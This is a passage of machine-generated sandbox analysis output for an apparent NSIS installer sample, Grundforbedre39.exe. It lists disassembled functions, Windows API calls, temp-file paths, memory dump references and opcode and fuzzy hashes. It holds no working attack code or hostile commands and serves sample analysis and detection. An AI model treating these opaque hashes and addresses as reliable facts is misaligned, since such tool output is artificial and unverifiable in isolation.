                                                                                      • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                                                      • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                                      • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405D49 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EDC,?,?), ref: 00405D7C
                                                                                      • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                                      • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                                                      • wsprintfA.USER32 ref: 00405DC0
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405DFB
                                                                                      • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E0A
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                                                      • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405C15
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                      • API String ID: 222337774-899692902
                                                                                      • Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                                      • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                                                      • Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                                      • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004062AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                                      • CharNextW.USER32(?,00000000,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                                      • CharPrevW.USER32(?,?,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
                                                                                      • "C:\Users\user\Desktop\Grundforbedre39.exe", xrefs: 004062AE
                                                                                      • *?|<>/":, xrefs: 00406300
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-1730066637
                                                                                      • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                                      • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                                                                      • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                                      • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404145 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                                                      • GetSysColor.USER32(00000000), ref: 0040417E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404196
                                                                                      • GetSysColor.USER32(?), ref: 004041A9
                                                                                      • SetBkColor.GDI32(?,?), ref: 004041B9
                                                                                      • DeleteObject.GDI32(?), ref: 004041D3
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                                      • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                                                                      • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                                      • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404A43 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                                                      • GetMessagePos.USER32 ref: 00404A66
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404A80
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                                      • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                                                                      • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                                      • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                      • MulDiv.KERNEL32(000BE468,?,000C0170), ref: 00402D4D
                                                                                      • wsprintfW.USER32 ref: 00402D5D
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                                      • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                                                                      • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                                      • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                      • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                      • String ID:
                                                                                      • API String ID: 4216380887-0
                                                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                      • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                      • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                      • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402870 Relevance: 9.1, APIs: 6, Instructions: 72memoryfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405C15
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 00402894
                                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                        • Part of subcall function 00403222: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00403230
                                                                                      • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004028B0
                                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                        • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403088
                                                                                        • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403109
                                                                                        • Part of subcall function 00403027: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 00403136
                                                                                        • Part of subcall function 00403027: wsprintfW.USER32 ref: 00403149
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402928
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2082585436-0
                                                                                      • Opcode ID: 8c6766bb6951d215d3c67dc1a7f9f2d38a2e1e8e733af242ff85fa37c0fc3889
                                                                                      • Instruction ID: 181021ac035c2af1142937af2620863fa5f7be1a0242ec6fd4154699f829fb45
                                                                                      • Opcode Fuzzy Hash: 8c6766bb6951d215d3c67dc1a7f9f2d38a2e1e8e733af242ff85fa37c0fc3889
                                                                                      • Instruction Fuzzy Hash: D9219A72804018BFCF11AFA5CD4889E7E79EF08324F24023AF514B62E0C6795D81DBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404935 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                                      • wsprintfW.USER32 ref: 004049DF
                                                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$&B
                                                                                      • API String ID: 3540041739-2907463167
                                                                                      • Opcode ID: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                                      • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                                                      • Opcode Fuzzy Hash: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                                      • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp$C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll
                                                                                      • API String ID: 3109718747-288752534
                                                                                      • Opcode ID: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                                                                      • Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
                                                                                      • Opcode Fuzzy Hash: ff5357058379e204ff40c3465f338181e73ead3c1c5b926bf222a7f711fefd23
                                                                                      • Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
